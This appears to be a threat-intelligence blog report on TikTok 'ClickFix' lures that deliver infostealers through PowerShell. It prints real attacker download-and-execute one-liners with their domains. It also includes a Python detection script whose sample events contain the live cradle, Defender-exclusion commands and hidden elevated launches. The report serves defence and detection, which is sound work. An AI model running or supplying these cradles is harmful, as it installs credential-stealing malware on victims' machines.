
TikTok ClickFix Attacks Targeting Windows Users: Infostealer Malware Delivered via PowerShell Social Engineering

  • Rescana
  • 18 hours ago

Executive Summary

The proliferation of TikTok as a global social media platform has introduced a new and highly effective vector for cybercriminals to distribute information-stealing malware, commonly referred to as infostealers. Recent intelligence has identified a surge in the use of the so-called ClickFix attack technique, wherein threat actors publish short, engaging TikTok videos that purport to offer free activation or cracked versions of popular software such as Windows, Spotify, Netflix, Adobe, and Discord Nitro. These videos instruct viewers to execute a single-line PowerShell command, which, when run with administrative privileges, initiates the download and execution of infostealer malware. The primary payloads observed in these campaigns are variants of Vidar, StealC, and Aura Stealer. The attacks are highly automated, leveraging AI-generated content, dynamic infrastructure, and legitimate cloud hosting services to evade detection and maximize reach. This report provides a comprehensive technical analysis of the attack chain, threat actor tactics, exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The threat actors behind the ClickFix campaigns are financially motivated cybercriminals, not currently attributed to any known Advanced Persistent Threat (APT) group. Their operations are characterized by opportunistic targeting, rapid infrastructure turnover, and the use of social engineering at scale. The attackers exploit the trust and virality of TikTok to reach a broad, global audience, focusing on users seeking unauthorized software activations. The campaigns are notable for their use of AI-generated video content, which increases the volume and diversity of lures while reducing operational overhead. The actors employ dynamic domain generation, cloud-based payload hosting (notably via Cloudflare Pages), and abuse of legitimate services such as Telegram and Steam for command-and-control (C2) communication and dead drop resolving. The monetization strategy centers on harvesting credentials, authentication cookies, and cryptocurrency wallets, which are then sold or used for further financial gain.

Technical Analysis of Malware/TTPs

The ClickFix attack chain is a sophisticated blend of social engineering, living-off-the-land techniques, and multi-stage malware delivery. The initial infection vector is a TikTok video, often AI-generated, that demonstrates a one-line PowerShell command. This command typically takes the form:

iex (irm hxxps://allaivo[.]me/spotify)

or

iex (irm slmgr[.]win/photoshop)

The command pairs Invoke-RestMethod (irm), which fetches the remote content, with Invoke-Expression (iex), which runs the returned text as PowerShell without a script file ever touching disk. The URL's domain and path vary with the impersonated product (the examples above are the Spotify and Photoshop lures). The fetched script performs several actions:

It creates hidden directories under APPDATA and LOCALAPPDATA and adds them to the Windows Defender exclusion list, a change that requires the elevated session the video told the victim to open, so the payloads dropped there afterwards are never scanned.

It downloads a secondary payload, typically named updater.exe or file.exe, from a cloud-hosted location such as file-epq[.]pages[.]dev or amssh[.]co. This executable is a variant of Vidar, StealC, or Aura Stealer.

The payload is executed as a hidden, elevated process. In some cases an additional executable (source.exe) is downloaded; it compiles C# source at runtime with the .NET C# compiler (csc.exe) and loads the result directly into memory, so the final stage never exists on disk as a pre-built binary for scanners to match.

Persistence is established by downloading and executing a PowerShell script (script.ps1) that sets up a registry key and deletes temporary folders to minimize forensic traces.

The infostealer exfiltrates browser credentials, authentication cookies, cryptocurrency wallets, and credentials from other applications. Exfiltration is performed via encrypted channels to C2 infrastructure, which may include Telegram bots, Steam profiles, and direct HTTP POST requests to attacker-controlled servers.

The attackers use legitimate services as dead drop resolvers, making C2 infrastructure highly resilient and difficult to disrupt. The use of Cloudflare Pages and similar services for payload hosting further complicates detection and takedown efforts.

Exploitation in the Wild

The ClickFix campaigns have been active since at least May 2025, with a marked increase in activity observed through October 2025. The attacks are global in scope, with no specific country or sector targeting. Victims are primarily individuals seeking free or pirated software activations, a demographic that spans all age groups and geographies due to the international reach of TikTok. Notable TikTok accounts used in these campaigns include @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771 (now inactive). The attackers frequently rotate accounts and domains to evade detection and platform enforcement.

The payloads delivered in the wild include Vidar, StealC, and Aura Stealer, each capable of harvesting a wide range of sensitive data. The campaigns have been observed leveraging dynamic URLs, AI-generated video content, and rapid infrastructure turnover. The use of legitimate cloud services for payload delivery and C2 communication has enabled the attackers to maintain high operational tempo and evade traditional security controls.

Victimology and Targeting

The primary victims of ClickFix attacks are end-users who are enticed by the promise of free or cracked software. These users are typically not security-savvy and may lack enterprise-grade endpoint protection. The attacks are indiscriminate, affecting individuals across all sectors and geographies. There is no evidence of targeting based on industry, organization, or country; rather, the attackers cast a wide net to maximize infection rates. The use of TikTok as the delivery platform ensures that the campaigns reach a diverse and global audience. The attackers exploit the platform's recommendation algorithms and viral content dynamics to amplify the reach of their lures. The demographic most at risk includes younger users and those with a propensity to seek unauthorized software, but the campaigns have the potential to impact any user exposed to the malicious content.

Mitigation and Countermeasures

Organizations and individuals can take several steps to mitigate the risk posed by ClickFix infostealer campaigns. First, block access to known malicious domains such as slmgr[.]win, file-epq[.]pages[.]dev, allaivo[.]me, and amssh[.]co at the network perimeter, while recognising that the actors rotate domains quickly, so a static blocklist buys time rather than closing the vector. Enable PowerShell Script Block Logging (Event ID 4104) so that both the pasted one-liner and the script it fetches are recorded in full, and alert on the iex (irm ...) download cradle, including its aliases (Invoke-Expression, Invoke-RestMethod, iwr/Invoke-WebRequest) and its pipeline form (irm ... | iex). Additions to the Windows Defender exclusion list from an interactive PowerShell session, and hidden or elevated process launches by PowerShell, are further high-signal events in this chain. Endpoint detection and response (EDR) solutions should be configured to flag and quarantine executables with suspicious names such as updater.exe, file.exe, and source.exe that PowerShell drops under APPDATA or LOCALAPPDATA or fetches from cloud-hosted sources.
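The monitoring called for above, applied to the script behaviour described under Technical Analysis, as an added example in Python. This is not code from the original article or from Rescana. It runs a handful of detection rules over constructed records of the kind a SIEM ingests from Windows: PowerShell Script Block Logging text (Event ID 4104) and process creation fields (Event ID 4688). The sample events, the regexes, the rule names and the severities are assumptions made here; the domain list and executable names are the ones the article quotes, re-armed from their defanged form so they can be matched.

```python
"""Detection rules for ClickFix-style PowerShell download cradles.

Added example, not code from the article. Input records are constructed
here to look like Windows PowerShell Script Block Logging (Event ID 4104)
and process creation (Event ID 4688) events as a SIEM would present them.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Indicators quoted in the article, re-armed from their defanged form.
KNOWN_BAD_DOMAINS = {"slmgr.win", "file-epq.pages.dev", "allaivo.me", "amssh.co"}
SUSPICIOUS_EXE_NAMES = {"updater.exe", "file.exe", "source.exe"}

# The regexes are assumptions about how the cradle and its variants are written.
_EXEC = r"(?:iex|invoke-expression)"
_FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest)"
CRADLE_WRAPPED = re.compile(rf"\b{_EXEC}\s*\(+\s*{_FETCH}\b", re.I)      # iex (irm ...)
CRADLE_PIPED = re.compile(rf"\b{_FETCH}\b[^|\r\n]*\|\s*{_EXEC}\b", re.I)  # irm ... | iex
DEFENDER_EXCLUSION = re.compile(
    r"\badd-mppreference\b[^\r\n]*-exclusion(?:path|process|extension)", re.I)
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I)
RUN_AS = re.compile(r"-verb\s+runas\b", re.I)
# Host names with or without a scheme, so "irm slmgr.win/photoshop" is caught too.
HOST = re.compile(r"(?:https?://)?\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)(?=[/\s'\")]|$)", re.I)


@dataclass(frozen=True)
class Event:
    event_id: int           # 4104 = script block text, 4688 = process creation
    text: str               # ScriptBlockText (4104) or CommandLine (4688)
    image: str = ""         # NewProcessName (4688 only)
    parent_image: str = ""  # ParentProcessName (4688 only)


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    event_index: int
    detail: str


def extract_hosts(text: str) -> set[str]:
    """Every host-like token in a script block, lower-cased."""
    return {m.group(1).lower() for m in HOST.finditer(text)}


def is_download_cradle(text: str) -> bool:
    """True for the wrapped form iex (irm ...) and the piped form irm ... | iex."""
    return bool(CRADLE_WRAPPED.search(text) or CRADLE_PIPED.search(text))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()


def analyze(events: list[Event]) -> list[Finding]:
    """Run every rule over every event; findings keep the index of the event that fired."""
    findings: list[Finding] = []
    for i, ev in enumerate(events):
        if ev.event_id == 4104:
            if is_download_cradle(ev.text):
                findings.append(Finding("ps_download_cradle", "high", i, ev.text.strip()[:80]))
            bad = extract_hosts(ev.text) & KNOWN_BAD_DOMAINS
            if bad:
                findings.append(Finding("known_bad_domain", "critical", i, ", ".join(sorted(bad))))
            if DEFENDER_EXCLUSION.search(ev.text):
                findings.append(Finding("defender_exclusion_added", "high", i, "Add-MpPreference -Exclusion*"))
            if HIDDEN_WINDOW.search(ev.text):
                # A hidden window is odd on its own; hidden plus RunAs matches the chain exactly.
                sev = "high" if RUN_AS.search(ev.text) else "medium"
                findings.append(Finding("hidden_window_launch", sev, i, "hidden window launch"))
        elif ev.event_id == 4688:
            # One of the named droppers started by PowerShell from a user profile directory.
            if (_basename(ev.image) in SUSPICIOUS_EXE_NAMES
                    and _basename(ev.parent_image) in {"powershell.exe", "pwsh.exe"}
                    and "\\appdata\\" in ev.image.lower()):
                findings.append(Finding("suspicious_child_of_powershell", "high", i, ev.image))
    return findings


# Constructed sample records (not real telemetry) mirroring the chain in the article.
SAMPLE_EVENTS = [
    Event(4104, "iex (irm https://allaivo.me/spotify)"),
    Event(4104, "iex (irm slmgr.win/photoshop)"),
    Event(4104, 'Add-MpPreference -ExclusionPath "$env:APPDATA\\.cache"; '
                'Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\.cache"'),
    Event(4104, 'Start-Process "$env:APPDATA\\.cache\\updater.exe" -WindowStyle Hidden -Verb RunAs'),
    Event(4688, '"C:\\Users\\victim\\AppData\\Roaming\\.cache\\updater.exe"',
          image="C:\\Users\\victim\\AppData\\Roaming\\.cache\\updater.exe",
          parent_image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"),
    Event(4104, "Get-ChildItem $env:TEMP | Measure-Object"),                         # benign
    Event(4104, "Invoke-RestMethod -Uri https://api.github.com/repos/psf/requests"),  # benign fetch, no iex
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity:8}] event {f.event_index}: {f.rule} ({f.detail})")
```

Running the file prints one line per finding for the constructed events; the two benign records produce nothing. The cradle rule is kept separate from the domain rule on purpose: the domains rotate within days while the shape of the cradle does not, so the cradle rule keeps firing on new infrastructure, and the domain rule only adds severity when a known indicator is present. The regex also covers the cmdlet aliases and the pipeline form, which a string match on the literal text iex (irm would miss.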

User education is critical: organizations should conduct awareness campaigns warning users never to run PowerShell commands copied from social media or unknown sources, and making clear that no legitimate software activation is performed by pasting a command into an elevated terminal. If compromise is suspected, treat every credential and session on the endpoint as stolen: reset passwords, revoke active sessions and tokens (the stealers take authentication cookies, so a password reset alone leaves existing sessions usable), treat any cryptocurrency wallet on the machine as exposed, review accounts for unauthorized access, and perform a thorough forensic analysis of the endpoint. Security teams should update detection rules to include the latest indicators of compromise (IOCs) associated with these campaigns.

For organizations with significant exposure to social media-driven threats, consider implementing application whitelisting, restricting PowerShell through AppLocker or Windows Defender Application Control rather than relying on the execution policy (which governs script files, not a command pasted into an interactive session, and is not a security boundary), and enforcing the principle of least privilege so that ordinary users cannot open the elevated session the lure depends on. Regularly review and update security policies to address emerging social engineering tactics and the abuse of legitimate cloud services for malware delivery.


About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to assess, monitor, and mitigate cyber risks across their extended supply chain. Our platform leverages advanced threat intelligence, continuous monitoring, and automated workflows to deliver actionable insights and enhance your organization’s security posture. For more information or to discuss how Rescana can help you manage cyber risk, we are happy to answer questions at ops@rescana.com.
